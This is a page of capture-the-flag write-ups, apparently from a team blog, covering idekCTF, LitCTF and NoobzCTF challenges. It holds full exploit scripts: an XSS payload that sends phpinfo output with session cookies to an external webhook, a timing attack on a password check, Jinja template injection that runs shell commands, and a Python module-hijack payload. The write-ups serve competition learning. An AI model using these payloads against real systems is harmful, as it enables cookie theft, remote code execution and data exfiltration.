    echo "Hello, ".Enhanced_Trim($_GET['name']);
}

?>

# filename: info.py

<?php
phpinfo();
?>

# filename: ngix.conf


user www-data;
worker_processes 1;

events {
worker_connections 1024;
}

http {
include /etc/nginx/mime.types;
default_type application/octet-stream;

    sendfile        on;
    keepalive_timeout  65;

    server {
        listen       80;
        server_name  localhost;

        location / {
            root   /usr/share/nginx/html;
            index  index.php index.html index.htm;
        }

        location = /info.php {
        allow 127.0.0.1;
        deny all;
        }

        location ~ \.php$ {
        root           /usr/share/nginx/html;
        fastcgi_param  SCRIPT_FILENAME  $document_root$fastcgi_script_name;
        include fastcgi_params;
        fastcgi_pass unix:/var/run/php/php8.2-fpm.sock;
        }

    }

}

As you can see, there are 3 main files to focus on

The first is the index file where we see how the page works and the filters used, in particular the fact that we cannot use /, spaces, etc.
An info.php file which is definitely suspect and not normally needed but probably has a purpose in the challange
And the ngix configuration file, which is very important because it is the one that prevents us from accessing info.php in a simple way.

Solution

This challenge is very nice in my opinion, neither too difficult nor too complex, it mixes different vulnerabilities in a really nice way...

The first one is designed to catch the cookie, because in the configuration of bot.js we see that the cookie is set to httpOnly, which makes the extraction much more difficult, but looking a little online we understand why it is present, that info.php in fact the function phpinfo() as well as showing several parameters of the php configuration and other information also shows the cookies present at that time... SO THAT'S THE OBJECTIVE, to get your own bot to open /info.php.

But how can we do this?

The first step is to be able to inject a payload that opens info.php and sends the file somewhere.

The only entry point we see is ? name=', which is not sanitised in the best way, in fact by doing <h1>BTC (we make sure that the tag closes itself, otherwise the final / will be filtered out) we notice that the h1 is rendered and this is a first sign that we can do an xss, although we notice that the classic <script>alert('ByteTheCookies') doesn't work, Probably some php configuration or some police, so the xss would be a bit more complex, but we can use the onerror parameter of tag img with some modifications, in fact, if we insert a classic <img src='invalid. jpg' onerror="alert('ByteTheCookies')", it will be sanitised by removing the spaces and will not allow the xss to run. But we can work around this very easily, in fact by looking for some workarounds on HackTricks and trying some of them, we find that the payload <img%0Csrc="invalid.jpg"onerror="alert('ByteTheCookies')" works.

GOOD we managed to bypass the xss now we have to create the payload we need...

Specifically, I used: fetch('{target}').then(r=>r.text()).then(t=>{fetch('{url_webhook}',{method:'POST',body:(f=new FormData(),f.append('file',new Blob([t],{type:'text/plain'}),'phpinfo.txt'),f)});console.log('Data sended');});

This payload makes an initial request and sends the content to a webhook in the form of a file, so it's all very simple.

However, the problem is that when this payload is sent, it will not work because the URLs contain / which will be removed and this is a significant problem.

However, to get around this we can use a very simple trick, we just need to encode the payload in base64 beforehand and use an eval(atob(payload)).

By sending this in the URL, we can make the payload work without any problems. DONE, RIGHT?

No, because analysing the nginx configuration we notice an important detail

location = /info.php {
        allow 127.0.0.1;
        deny all;
        }

As we can see, /info.php is only accessible from localhost, and spoiler, our bot is not on the same server as the challenge.

This may seem like a big obstacle, but in reality, if we search the web for ngix workarounds, we can find something very interesting.

As we can see on Hacktricks, if we insert an accessible page immediately after a non-accessible page in the ngix URL, it will redirect us correctly to the non-accessible page, which is exactly what we need.

So the final solution becomes:

# filename: exploit.py

import base64

url = "http://idek-hello.chal.idek.team:1337/"
url_webhook = 'https://webhook.site/8b10c871-1e0b-4050-8
2e3-e102a73da54e'
url_admin = 'https://admin-bot.idek.team/idek-hello'

def main():

    # Bypass hacktrics https://book.hacktricks.xyz/pentesting-web/proxy-waf-protections-bypass#php-fpm
    target = "http://idek-hello.chal.idek.team:1337/info.php/index.php"

    exploit = ("fetch('" + target + "').then(r=>r.text()).then(t=>{fetch('"+url_webhook+"',{method:'POST',body:(f=new FormData(),f.append('file',new Blob([t],{type:'text/plain'}),'phpinfo.txt'),f)});console.log('Dati inviati al webhook');});").encode()

    main_payload = base64.b64encode(exploit).decode()

    payload = """<img%0Csrc="invalid.jpg"onerror="eval(atob('""" + main_payload + """'));">""" # Bypassed with %0C

    final_url_whith_exploit = f"{url}?name={payload}"

    print(f"Final url: {final_url_whith_exploit}") # Send the url on the admin bot and download the file on webhook.site

    print(f"Now copy and paste the url on the admin bot: {url_admin} and send the requeste to the admin bot, after this go to the webhook.site and download the file and search the flag in the file")

if __name__ == '__main__':
  main()

flag: :spoiler[idek{Ghazy_N3gm_Elbalad}]

LitCTF2024 | Kirbytime

Tue, 13 Aug 2024 00:00:00 GMT

Introduction

We find ourselves in front of a very pink Kirby-themed page, where we are asked to enter a password of 7 characters.

Source

# filename: main.py

import sqlite3
from flask import Flask, request, redirect, render_template
import time
app = Flask(__name__)


@app.route('/', methods=['GET', 'POST'])
def login():
    message = None
    if request.method == 'POST':
        password = request.form['password']
        real = 'REDACTED'
        if len(password) != 7:
            return render_template('login.html', message="you need 7 chars")
        for i in range(len(password)):
            if password[i] != real[i]:
                message = "incorrect"
                return render_template('login.html', message=message)
            else:
                time.sleep(1)
        if password == real:
            message = "yayy! hi kirby"

    return render_template('login.html', message=message)


if __name__ == '__main__':
    app.run(host='0.0.0.0')

As we can see in the code at the '/' endpoint, when the method and post, it takes the password value from the form, checks the length to be 7 and starts iterating over each character to check if it is correct, it triggers a time.sleep(1) otherwise it returns an error.

Solution

The solution is very simple, in fact we can compare it to a kind of time based, when the character is correct we know that the request will take n seconds to return depending on the number of correct characters. With this script we can easily find the flag, but only with a little patience (I recommend a cup of coffee in between).

# filename: exploit.py

import string
import requests

url = 'redacted'

alphabet = string.printable

length = 7

correct_flag = 'a' * length
correct_letter = 0
flag_list = list(correct_flag)
number_of_second_to_wait = 7
while (correct_letter != length):
    for letter in alphabet:
        flag_list[correct_letter] = letter
        flag = "".join(flag_list)
        print(flag)
        payload = {"password": flag}
        r = requests.post(url=url, data=payload)
        assert r.status_code == 200
        print("Time: ", r.elapsed.total_seconds())
        if r.elapsed.total_seconds() >= number_of_second_to_wait:
            correct_letter = correct_letter + 1
            number_of_second_to_wait += 1
            print(flag)
            break

print("Flag found: ", "LITCTF{" + flag + "}")

flag: :spoiler[LITCTF{kBySlaY}]

NoobzCTF2024 | File Sharing Portal

Tue, 06 Aug 2024 00:00:00 GMT

Introduction

The ctf has a very simple structure: we have a form in which we are asked to insert a tar file; once the tar file has been inserted, it is unzipped and we are shown the name of files it contains; by clicking on the different files, we can read their contents.

Source

The source has comments added later to allow a better understanding of the code in the writeups

# filename: server.py

#!/usr/bin/env python3
from flask import Flask, request, redirect, render_template, render_template_string
import tarfile
from hashlib import sha256
import os
app = Flask(__name__)

@app.route('/',methods=['GET','POST'])
def main():
    # This function mainly deals with loading the tar file into the server's file system.
    global username
    if request.method == 'GET':
        return render_template('index.html')
    elif request.method == 'POST':
        file = request.files['file']
        if file.filename[-4:] != '.tar': # Check that the file passed is actually a tar file
            return render_template_string("<p> We only support tar files as of right now!</p>") # Otherwise, it renders an error message
        name = sha256(os.urandom(16)).digest().hex() # Creates a random name that it will use to name our tar and the folder in the server's file system
        os.makedirs(f"./uploads/{name}", exist_ok=True) # Create the directory
        file.save(f"./uploads/{name}/{name}.tar") # Save the tar file
        try:
            # Extract the tar file
            tar_file = tarfile.TarFile(f'./uploads/{name}/{name}.tar')
            tar_file.extractall(path=f'./uploads/{name}/')
            return render_template_string(f"<p>Tar file extracted! View <a href='/view/{name}'>here</a>")
        except:
            return render_template_string("<p>Failed to extract file!</p>")

@app.route('/view/<name>')
def view(name):
    # This function displays the files contained in the .tar file
    if not all([i in "abcdef1234567890" for i in name]): # Check that the file name is in hexadecimal, to avoid any kind of malicious input 
        return render_template_string("<p>Error!</p>")
        #print(os.popen(f'ls ./uploads/{name}').read())
            #print(name)
    files = os.listdir(f"./uploads/{name}") # List all files in the previously created folder 
    out = '<h1>Files</h1><br>'
    files.remove(f'{name}.tar')  # Remove the tar file from the list
    for i in files:
        out += f'<a href="/read/{name}/{i}">{i}</a>' # Show via templates all file names
       # except:
    return render_template_string(out) # Render the template with the render_template_string function

@app.route('/read/<name>/<file>')
def read(name,file):
    # The function shows the contents of the single file
    if (not all([i in "abcdef1234567890" for i in name])): # Check that the file name is in hexadecimal, to avoid any kind of malicious input 
        return render_template_string("<p>Error!</p>")
    if ((".." in name) or (".." in file)) or (("/" in file) or "/" in name):  # Other controls to avoid path er
        return render_template_string("<p>Error!</p>")
    f = open(f'./uploads/{name}/{file}') # Open the file
    data = f.read()
    f.close()
    return data # Return the content of file

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=1337)

We can therefore see that there are several parameter checks, and at first one might think that the code is 100% safe.

Solution

The first thing that came to mind was to create a symbolic link to access the flag, and indeed this works (try with server.py), the problem is that the filename of the flag is unknown and this does not allow us to create a valid symbolic link.

Once we realised this, we did a thorough analysis of the code and came to the conclusion that the only thing that was not being checked was the name of the unpacked tar file allowing us to insert anything. By combining this with the 'render_template_string' function (a vulnerable function of flask), it is possible to perform a template injection.

# filename: exploit.py

import requests
import os
import tarfile
from bs4 import BeautifulSoup

url = 'http://redacted.challs.n00bzunit3d.xyz:8080/'


def create_tar(tar_name, file):
    with tarfile.open(tar_name, 'w') as tar:
        tar.add(file, arcname=os.path.basename(file))
    print(f'Tar file created: {tar_name}')


def create_payload(payload):
    with open(payload, 'w') as f:
        f.write('Remember to byte the cookies')

    create_tar('exploit.tar', payload)
    print(f'Payload created: {payload}')


def get_url_view(text):
    soup = BeautifulSoup(text, 'html5lib')
    return [a['href'] for a in soup.find_all('a', href=True)][0]


def leak_subprocess_index():
    payload = "{{int.__class__.__base__.__subclasses__()}}"
    create_payload(payload)

    r = requests.post(url, files={'file': open('exploit.tar', 'rb')})

    url_file = get_url_view(r.text)
    r = requests.get(url + url_file)
    text = r.text[r.text.index('[')+1:]

    list_classes = text.split(',')

    for i, c in enumerate(list_classes):
        if 'subprocess.Popen' in c:
            print(f'Index subprocess.Popen: {i}')
            return str(i)


def get_flag(index):
    payload = "{{int.__class__.__base__.__subclasses__()[" + \
        index + "]('cat *', shell=True, stdout=-1).communicate()}}"
    create_payload(payload)

    r = requests.post(url, files={'file': open('exploit.tar', 'rb')})

    url_file = get_url_view(r.text)
    r = requests.get(url + url_file)

    flag = r.text[r.text.index('n00bz{'):r.text.index('}')+1]
    print(f'Flag: {flag}')


def main():
    subprocess_index = leak_subprocess_index()
    get_flag(subprocess_index)


if __name__ == '__main__':
    main()

flag: :spoiler[n00bz{n3v3r_7rus71ng_t4r_4g41n!_b3506983087e}]

NoobzCTF2024 | WaaS

Tue, 06 Aug 2024 00:00:00 GMT

Introduction

WaaS (Writing as a Service) allows us to overwrite a file on the system (after some input validation) and insert anything (until a newline is met) we want in it.

import subprocess
from base64 import b64decode as d
while True:
        print("[1] Write to a file\n[2] Get the flag\n[3] Exit")
        try:
                inp = int(input("Choice: ").strip())
        except:
                print("Invalid input!")
                exit(0)
        if inp == 1:
                file = input("Enter file name: ").strip()
                assert file.count('.') <= 2 # Why do you need more?
                assert "/proc" not in file # Why do you need to write there?
                assert "/bin" not in file # Why do you need to write there?
                assert "\n" not in file # Why do you need these?
                assert "chall" not in file # Don't be overwriting my files!
                try:
                        f = open(file,'w')
                except:
                        print("Error! Maybe the file does not exist?")

                f.write(input("Data: ").strip())
                f.close()
                print("Data written sucessfully!")

        if inp == 2:
                flag = subprocess.run(["cat","fake_flag.txt"],capture_output=True) # You actually thought I would give the flag?
                print(flag.stdout.strip())

Solution

At first one may think of trying to bypass the input validation to perhaps rewrite the workings of the cat command or the challenge file itself, but this isn't possible. Something very bizarre is the imported but unused b64decode from the base64 module, which is what allows us to solve the challenge. When python imports modules it looks in sys.path, which has a list of valid directories to import modules from. After a quick scan through the python3 docs we find out that the first directory it looks through is the same directory the file is in, this means that if we have a base64.py file in the directory then python will try to import a b64decode symbol from that file instead of the common known module. One more feature of python's import behavior we can use is the that all the code in an imported module will be executed. For example if a file test.py has print('Hello, World!') and it can be executed (for example if it's at the lowest indentation level) then a file with import test will indeed see Hello, World! printed to stdout. Therefore, since the open function with a 'w' flag will create a file if it does not exist, we can simply create a file named base64.py and write our malicious code in it. Something like this will do the trick:

import os; b64decode = 0; os.system("cat flag.txt")

But the flag isn't our yet; we need to use the fact that the instance does not reset its files every time we connect to it, which means that our base64.py will remain in the directory for the lifetime of the instance. This means we simply need to reconnect to it and get our flag.

solve.py

from pwn import *

def solve():
  r = remote('challs.n00bzunit3d.xyz', 10478) # PORT depends on the instance

  r.sendlineafter(b'Choice: ', b'1') # 1 to write a file
  r.sendlineafter(b'Enter file name: ', b'base64.py')
  r.sendlineafter(b'Data: ', b'import os; b64decode = 0; os.system("cat flag.txt")')

  r.close()

  r = remote('challs.n00bzunit3d.xyz', 10478) # PORT depends on the instance
  flag = r.recvline().decode()
  print(f'flag: {flag}')
  r.close()

if __name__ == '__main__':
  solve()

flag: :spoiler[n00bz{0v3rwr1t1ng_py7h0n3_m0dul3s?!!!_f5c63f47af0e}]

ByteTheCookies

Jeanne DHACK CTF 2026 | Mobile Odyssey

Introduction

Source

Solution

Post notes

Backdoorctf 2025 | Gamble

Introduction

CornCTF2025 | Aeronaut

Introduction

Source

Solution

CornCTF2025 | ECRSA

Introduction

Source

Solution

Recovering secret_point

Figuring out the curve parameters

Getting the flag

Full solve script

WWWFctf2025 | Solidity Jail 1

Introduction

Analysis of the challange

My Solve

WWFctf2025 | Blank Login

Introduction

Source

Solution

L3akctf 2025 | Beneath the Surface

File

Solution

CornCTF2025 | Simple Chat

Introduction

Source

Solution

Ulisse2025 | Telemetry

Introduction

Source

Solution

K1ndasus2025 | Key in the haystack

Introduction

Solution

Srdnlen2025 | Confusion

Introduction

Solution

Srdnlen2025 | Ben 10

Introduction

Source

Solution

Srdnlen2025 | Speed

Introduction

Source

Solution

Trx2025 | Online Python Editor

Introduction

Source

Solution

M0lecon2025beginner | GoSecureIt

Introduction

Source

Solution

M0lecon2025beginner | ImgPlace

Introduction

Source

Solution

M0lecon2025beginner | SmallAuth

Introduction

Solution

IronCTF2024 | MovieReviewApp

Introduction

Source

Solution

Leaked source

Exploit

IronCTF2024 | b64SiteViewer

Introduction

Source

Solution

Bypass the first filter

Bypassing the second filter

Recovering `secret_point`